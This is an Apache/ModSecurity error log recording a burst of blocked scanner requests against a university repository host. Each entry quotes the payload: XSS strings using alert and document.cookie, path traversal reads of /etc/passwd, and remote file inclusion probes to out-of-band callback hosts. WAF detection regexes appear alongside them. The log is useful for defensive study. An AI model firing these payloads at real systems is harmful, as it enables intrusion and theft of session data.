[Tue Aug 29 11:51:20.558733 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x22>< found within ARGS:id: </form><iMg src=x onerror=\\x22prompt(document.domain)\\x22><form>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/Forms/rpAuth_1"] [unique_id "ZO15SMCo-f0AAAmNp3wAAAAQ"]
[Tue Aug 29 11:51:20.682857 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:id: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/phpmyadmin/setup/index.php"] [unique_id "ZO15SMCo-f0AAAnIlf4AAAAV"]
[Tue Aug 29 11:51:21.545184 2023] [:error] [pid 2443] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:RESULT. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );// found within ARGS:RESULT: \\x22,msgArray);alert(document.domain);//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/info.php"] [unique_id "ZO15ScCo-f0AAAmLPSUAAAAN"]
[Tue Aug 29 11:51:21.588664 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/setup/index.php"] [unique_id "ZO15ScCo-f0AAAm@5xgAAAAH"]
[Tue Aug 29 11:51:21.715059 2023] [:error] [pid 2495] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:searchOwnerUserName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:searchOwnerUserName: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/secure/ConfigurePortalPages!default.jspa"] [unique_id "ZO15ScCo-f0AAAm-Mc4AAAAI"]
[Tue Aug 29 11:51:22.916990 2023] [:error] [pid 2497] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword"] [unique_id "ZO15SsCo-f0AAAnB5VAAAAAJ"]
[Tue Aug 29 11:51:22.969455 2023] [:error] [pid 2145] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/api/sso/v2/sso/jwt"] [unique_id "ZO15SsCo-f0AAAhhc1QAAAAd"]
[Tue Aug 29 11:51:22.971286 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:filtervalue. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:filtervalue: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/Portal/Portal.mwsl"] [unique_id "ZO15SsCo-f0AAAmNp4QAAAAQ"]
[Tue Aug 29 11:51:23.563453 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:err. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -->< found within ARGS:err: --><script>alert('2Ue0IThdcrNit2de4iq3Tr8D1X0')</script><!--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/remote/login"] [unique_id "ZO15S8Co-f0AAAm@5xwAAAAH"]
[Tue Aug 29 11:51:23.781540 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:viewSurveyError. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:viewSurveyError: Unknown survey\\x22><img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/Main/Default.aspx"] [unique_id "ZO15S8Co-f0AAAjdQUUAAAAZ"]
[Tue Aug 29 11:51:24.759177 2023] [:error] [pid 2443] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15TMCo-f0AAAmLPSwAAAAN"]
[Tue Aug 29 11:51:24.972403 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php"] [unique_id "ZO15TMCo-f0AAAkyyFAAAAAW"]
[Tue Aug 29 11:51:26.764777 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:shortcode_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:shortcode_id: 1\\x22 onmouseover=alert(document.domain)//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15TsCo-f0AAAkr0F8AAAAC"]
[Tue Aug 29 11:51:26.784147 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:MESSAGE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:MESSAGE: MESSAGE</textarea></script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/activehelper-livehelp/server/offline.php"] [unique_id "ZO15TsCo-f0AAAnIlgwAAAAV"]
[Tue Aug 29 11:51:26.828989 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:type: \\x22</script><script>alert(document.domain);</script><script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/log"] [unique_id "ZO15TsCo-f0AAAnTlKcAAAAA"]
[Tue Aug 29 11:51:27.027753 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:hostname: </title><script>alert(document.domain)</script><title>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/php/telnet_form.php"] [unique_id "ZO15T8Co-f0AAAmNp44AAAAQ"]
[Tue Aug 29 11:51:27.596043 2023] [:error] [pid 2443] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');\\x22> found within ARGS:uid: \\x22><img src=\\x22x\\x22 onerror=\\x22alert('XSS');\\x22>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/login/"] [unique_id "ZO15T8Co-f0AAAmLPTIAAAAN"]
[Tue Aug 29 11:51:28.616028 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:section. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /)</ found within ARGS:section: \\x22><h1>hello</h1><script>alert(/2Ue0IR2M1XBxYBON8r2blbSH9hk/)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/cgi-bin/manlist"] [unique_id "ZO15UMCo-f0AAAm7m@8AAAAE"]
[Tue Aug 29 11:51:28.819758 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:galleryId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:galleryId: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/tidio-gallery/popup-insert-help.php"] [unique_id "ZO15UMCo-f0AAAlUljIAAAA0"]
[Tue Aug 29 11:51:28.936435 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:advSearch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22></ found within ARGS:advSearch: 0'\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15UMCo-f0AAAjdQVMAAAAZ"]
[Tue Aug 29 11:51:29.556452 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:username: '\\x22><script>javascript:alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/timesheet/login.php"] [unique_id "ZO15UcCo-f0AAAm80P4AAAAF"]
[Tue Aug 29 11:51:30.623492 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:callback. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:callback: </script><img/src/onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15UsCo-f0AAAmQ-yQAAAAb"]
[Tue Aug 29 11:51:30.675823 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:routineName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:routineName: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/jsps/genrequest.jsp"] [unique_id "ZO15UsCo-f0AAAlUljkAAAA0"]
[Tue Aug 29 11:51:30.723423 2023] [:error] [pid 2502] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:usr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:usr: admin'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/login.php"] [unique_id "ZO15UsCo-f0AAAnGkJYAAAAR"]
[Tue Aug 29 11:51:31.571601 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.pro\\x22><img src=x onerror=alert(document.domain)> found within TX:1: oast.pro\\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/cas/logout"] [unique_id "ZO15U8Co-f0AAAm@5y4AAAAH"]
[Tue Aug 29 11:51:32.687260 2023] [:error] [pid 2517] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Display_FAQ. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:Display_FAQ: </script><svg/onload=alert(document.cookie)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO15VMCo-f0AAAnVEdYAAAAB"]
[Tue Aug 29 11:51:33.750014 2023] [:error] [pid 2521] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:id: \\x22><script>alert('2Ue0HEhxUkrmNh9pZggHjrmQ3SN')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/jira/secure/BrowseProject.jspa"] [unique_id "ZO15VcCo-f0AAAnZfDQAAAAG"]
[Tue Aug 29 11:51:34.888427 2023] [:error] [pid 2497] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:action: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO15VsCo-f0AAAnB5WwAAAAJ"]
[Tue Aug 29 11:51:35.066746 2023] [:error] [pid 2526] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15V8Co-f0AAAnepMYAAAAK"]
[Tue Aug 29 11:51:35.099962 2023] [:error] [pid 2497] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/webEdition/showTempFile.php"] [unique_id "ZO15V8Co-f0AAAnB5XYAAAAJ"]
[Tue Aug 29 11:51:35.535758 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15V8Co-f0AAAnd2@cAAAAI"]
